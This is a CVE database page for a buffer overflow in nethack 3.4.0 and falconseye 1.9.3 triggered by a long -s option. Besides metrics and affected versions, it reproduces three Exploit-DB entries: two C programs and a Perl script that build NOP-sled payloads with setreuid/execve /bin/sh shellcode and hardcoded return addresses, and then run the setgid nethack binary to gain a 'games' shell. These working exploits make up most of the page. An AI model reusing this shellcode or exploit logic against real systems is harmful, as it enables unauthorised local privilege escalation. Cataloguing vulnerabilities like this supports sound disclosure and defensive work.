Notifications for a CVE
Stay informed of any changes for a specific CVE.
CVE Descriptions
Buffer overflow in (1) nethack 3.4.0 and earlier, and (2) falconseye 1.9.3 and earlier, which is based on nethack, allows local users to gain privileges via a long -s command line option.
CVE Informations
Related Weaknesses
| Weakness Name | Source | |
|---|---|---|
| Buffer Copy without Checking Size of Input ('Classic Buffer Overflow') The product copies an input buffer to an output buffer without verifying that the size of the input buffer is less than the size of the output buffer, leading to a buffer overflow. |
Metrics
| Metrics | Score | Severity | CVSS Vector | Source |
|---|---|---|---|---|
| V2 | 4.6 | AV:L/AC:L/Au:N/C:P/I:P/A:P | nvd@nist.gov |
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
EPSS Percentile
The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
Exploit information
Exploit Database EDB-ID : 22233
Publication date : 2003-02-09 23h00 +00:00
Author : tsao@efnet
EDB Verified : Yes
// source: https://www.securityfocus.com/bid/6806/info
By passing an overly large string when invoking nethack, it is possible to corrupt memory.
By exploiting this issue it may be possible for an attacker to overwrite values in sensitive areas of memory, resulting in the execution of arbitrary attacker-supplied code. As nethack may be installed setgid 'games' on various systems this may allow an attacker to gain elevated privileges.
slashem, jnethack and falconseye are also prone to this vulnerability.
/*
tsao@efnet #!IC@efnet 2k3
thnx to aleph1 for execve shellcode &
davidicke for setreuid() shellcode
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
char code[] =
"\x29\xc4\x31\xc0\x31\xc9\x31\xdb\xb3\x0c\x89\xd9\xb0\x46\xcd\x80"
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
unsigned long sp(void) {
__asm__("movl %esp,%eax");
}
int main(int argc, char **argv) {
char *p;
int i, off;
p = malloc(sizeof(char) * atoi(argv[1]));
memset(p,0x90,atoi(argv[1]));
off = 220 - strlen(code);
printf("shellcode at %d->%d\n",off,off+strlen(code));
for(i=0;i<atoi(argv[1]);i++)
p[i+off] = code[i];
*(long *) &p[220] = sp() - atoi(argv[2]);
printf("Using %x\n",sp() - atoi(argv[2]));
execl("/usr/games/lib/nethackdir/nethack","nethack","-s",p,0);
perror("wtf");
}
Exploit Database EDB-ID : 22234
Publication date : 2003-02-09 23h00 +00:00
Author : bob@dtors.net
EDB Verified : Yes
// source: https://www.securityfocus.com/bid/6806/info
By passing an overly large string when invoking nethack, it is possible to corrupt memory.
By exploiting this issue it may be possible for an attacker to overwrite values in sensitive areas of memory, resulting in the execution of arbitrary attacker-supplied code. As nethack may be installed setgid 'games' on various systems this may allow an attacker to gain elevated privileges.
slashem, jnethack and falconseye are also prone to this vulnerability.
/* DSR-nethack.c by bob@dtors.net
* Vulnerbility Found by tsao.
*
* Local BufferOverflow that leads
* to elevated privileges [games].
*
* Basic PoC code...nothing special.
*[bob@dtors bob]$ ./DSR-nethack
*
* DSR-nethack.c By bob.
* Local Exploit for Nethack 3.4.0
* DSR-[www.dtors.net]-DSR
*
* ret: 0xbffffd86
*
* Cannot find any current entries for
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.���
* Usage: nethack -s [-v] <playertypes> [maxrank] [playernames]
* Player types are: [-p role] [-r race]
* sh-2.05b$ id -a
* uid=12(games) gid=501(bob) groups=501(bob)
* sh-2.05b$
*
* www.dtors.net // www.b0f.net
*/
#include <stdio.h>
char shellcode[]= /* shellcode by bob */
"\x29\xc4\x31\xc0\x31\xc9\x31\xdb\xb3\x0c\x89\xd9\xb0\x46\xcd\x80" //minus
"\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89"
"\xe3\x8d\x54\x24\x08\x50\x53\x8d\x0c\x24\xb0\x0b\xcd\x80";
int main ()
{
unsigned long ret = 0xbffffd86; //Redhat 8.0 i386
char buf[224];
char smeg[1024];
char *ptr;
int i=0;
fprintf(stdout, "\n\tDSR-nethack.c By bob.\n");
fprintf(stdout, "Local Exploit for Nethack 3.4.0\n");
fprintf(stdout, "\tDSR-[www.dtors.net]-DSR\n");
memset(buf, 0x41, sizeof(buf));
ptr = smeg;
for (i = 0; i < 1024 - strlen(shellcode) -1; i++) *(ptr++) = 0x90;
for (i = 0; i < strlen(shellcode); i++) *(ptr++) = shellcode[i];
smeg[1024 - 1] = '\0'; //null byte
memcpy(smeg,"EGG=",4);
putenv(smeg);
buf[220] = (ret & 0x000000ff);
buf[221] = (ret & 0x0000ff00) >> 8;
buf[222] = (ret & 0x00ff0000) >> 16;
buf[223] = (ret & 0xff000000) >> 24;
buf[224] = '\0';
fprintf(stdout,"ret: 0x%08x\n",ret);
execl("/usr/games/lib/nethackdir/nethack", "nethack", "-s", buf,
NULL); //weeoooweeeeooowooo
return 0;
}
Exploit Database EDB-ID : 22235
Publication date : 2003-02-09 23h00 +00:00
Author : tsao@efnet
EDB Verified : Yes
source: https://www.securityfocus.com/bid/6806/info
By passing an overly large string when invoking nethack, it is possible to corrupt memory.
By exploiting this issue it may be possible for an attacker to overwrite values in sensitive areas of memory, resulting in the execution of arbitrary attacker-supplied code. As nethack may be installed setgid 'games' on various systems this may allow an attacker to gain elevated privileges.
slashem, jnethack and falconseye are also prone to this vulnerability.
#!/usr/bin/perl -w
#
# tsao@efnet #!IC@efnet 2k3
# thnx to aleph1 for execve shellcode
# davidicke for setreuid() shellcode
$sc .= "\x31\xdb\x31\xc9\xbb\xff\xff\xff\xff\xb1\x0c\x31\xc0\xb0\x46\xcd\x80\x31\xdb";
$sc .= "\x31\xc9\xb3\x0c\xb1\x0c\x31\xc0\xb0\x46\xcd\x80\xeb\x24\x5e\x8d\x1e\x89\x5e";
$sc .= "\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12";
$sc .= "\x8d\x4e\x0b\x8b\xd1\xcd\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff\x2f\x62";
$sc .= "\x69\x6e\x2f\x73\x68\x01";
for ($i = 0; $i < (224 - (length($sc)) - 4); $i++) {
$buf .= "\x90";
}
$buf .= $sc;
$buf .= "\xd2\xf8\xff\xbf";
exec("/usr/games/lib/nethackdir/nethack -s '$buf'");
Products Mentioned
Configuraton 0
Falconseye_project>>Falconseye >> Version To (including) 1.9.3
- Falconseye_project>>Falconseye >> Version - (Open CPE detail)
- Falconseye_project>>Falconseye >> Version 1.9.3 (Open CPE detail)
Nethack>>Nethack >> Version To (including) 3.4.0
- Nethack>>Nethack >> Version 3.2.2 (Open CPE detail)
- Nethack>>Nethack >> Version 3.2.3 (Open CPE detail)
- Nethack>>Nethack >> Version 3.3.0 (Open CPE detail)
- Nethack>>Nethack >> Version 3.4.0 (Open CPE detail)
Configuraton 0
Debian>>Debian_linux >> Version 2.2
- Debian>>Debian_linux >> Version 2.2 (Open CPE detail)
Debian>>Debian_linux >> Version 3.0
- Debian>>Debian_linux >> Version 3.0 (Open CPE detail)
References
http://www.securityfocus.com/archive/1/311172/2003-02-08/2003-02-14/0
Tags : mailing-list, x_refsource_BUGTRAQ
Tags : mailing-list, x_refsource_BUGTRAQ
